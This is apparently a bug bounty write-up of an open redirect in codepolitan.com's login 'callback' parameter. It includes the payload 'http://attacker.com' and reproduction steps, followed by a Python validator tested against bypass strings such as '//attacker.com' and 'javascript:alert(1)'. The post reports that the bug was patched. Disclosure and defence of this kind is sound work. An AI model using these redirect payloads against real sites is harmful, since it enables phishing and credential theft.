Open Redirect On Codepolitan.com
Description:
Open redirects and forwards are possible when a web application accepts untrusted input and uses it as the target of a redirect. By changing that untrusted URL to point at a malicious site, an attacker can mount a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, the phishing link looks more trustworthy. Unvalidated redirects and forwards can also be used to craft a URL that passes the application's access control check and then forwards the attacker to privileged functions they would normally not be able to access.
Impact:
A user can be forced from the Codepolitan website to an untrusted website.
Location of bug:
https://www.codepolitan.com/users/login?callback=
Payload:
http://attacker.com
Reproduce:
1. Open https://www.codepolitan.com/users/login?callback=http://attacker.com
2. Log in, and you will be redirected to the external site supplied in callback (http://attacker.com in the payload above).
Conclusion:
An open redirect puts users at risk because they can be sent to an untrusted website (scam/phishing) without noticing.
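The fix for a login callback parameter like the one above is to only honour same-site targets. The following is an added example, not code from the original post or from Codepolitan; the host name, default landing page and the function name safe_redirect_target are assumptions for the demo.

```python
from typing import Optional
from urllib.parse import urlsplit, unquote

# Assumed values for the demo; Codepolitan's real login handler is not known to us.
SITE_HOST = "www.codepolitan.com"
DEFAULT_AFTER_LOGIN = "/"


def safe_redirect_target(callback: Optional[str], site_host: str = SITE_HOST) -> str:
    """Return a post-login redirect that stays on site_host, else the default page.

    Accepts a local path ("/dashboard") or an absolute http(s) URL on our own host
    (returned as a local path). Rejects other hosts, scheme-relative "//host" URLs,
    percent-encoded or backslash variants of those, and non-HTTP schemes.
    """
    if not callback:
        return DEFAULT_AFTER_LOGIN
    # Normalise first: decode percent-encoding so "%2F%2Fevil" is seen as "//evil",
    # and treat backslashes as slashes because browsers do while many parsers do not.
    cand = unquote(callback).strip().replace("\\", "/")
    if any(ord(c) < 0x20 for c in cand):  # embedded control characters: refuse
        return DEFAULT_AFTER_LOGIN
    parts = urlsplit(cand)
    if parts.scheme or parts.netloc:
        # Absolute or scheme-relative URL: only http(s) on our exact host is allowed.
        # parts.hostname strips userinfo, so "site@attacker.com" resolves to attacker.com.
        if parts.scheme not in ("http", "https") or parts.hostname != site_host:
            return DEFAULT_AFTER_LOGIN
        path = parts.path or "/"
    else:
        path = parts.path
    # A relative target must be a single-slash path; "//" would be scheme-relative.
    if not path.startswith("/") or path.startswith("//"):
        return DEFAULT_AFTER_LOGIN
    query = f"?{parts.query}" if parts.query else ""
    return path + query


if __name__ == "__main__":
    # Constructed sample inputs: the report's payload plus common bypass variants.
    for value in ["http://attacker.com", "//attacker.com", "%2F%2Fattacker.com",
                  "/\\attacker.com", "javascript:alert(1)",
                  "https://www.codepolitan.com@attacker.com/",
                  "/dashboard?next=1", "https://www.codepolitan.com/courses"]:
        print(f"{value!r:45} -> {safe_redirect_target(value)!r}")
```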
Video:
https://youtu.be/uQ2OhTbcVOI
Note:
The Codepolitan crew was very fast patching the bug, and they will also give me the SWAG, yeay!